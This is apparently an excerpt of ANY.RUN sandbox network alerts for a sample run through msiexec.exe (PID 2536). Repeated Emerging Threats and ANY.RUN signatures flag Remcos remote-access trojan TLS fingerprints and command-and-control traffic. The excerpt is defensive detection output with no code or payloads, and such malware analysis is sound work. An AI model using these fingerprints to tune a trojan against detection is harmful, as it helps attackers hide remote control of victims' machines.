REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash
2536
msiexec.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 25
2536
msiexec.exe
Malware Command and Control Activity Detected
ET JA3 Hash - Remcos 3.x/4.x TLS Connection
2536
msiexec.exe
Malware Command and Control Activity Detected
ET JA3 Hash - Remcos 3.x/4.x TLS Connection
2536
msiexec.exe
A Network Trojan was detected
REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash
2536
msiexec.exe
A Network Trojan was detected
REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash
2536
msiexec.exe
Malware Command and Control Activity Detected
ET JA3 Hash - Remcos 3.x/4.x TLS Connection
No debug info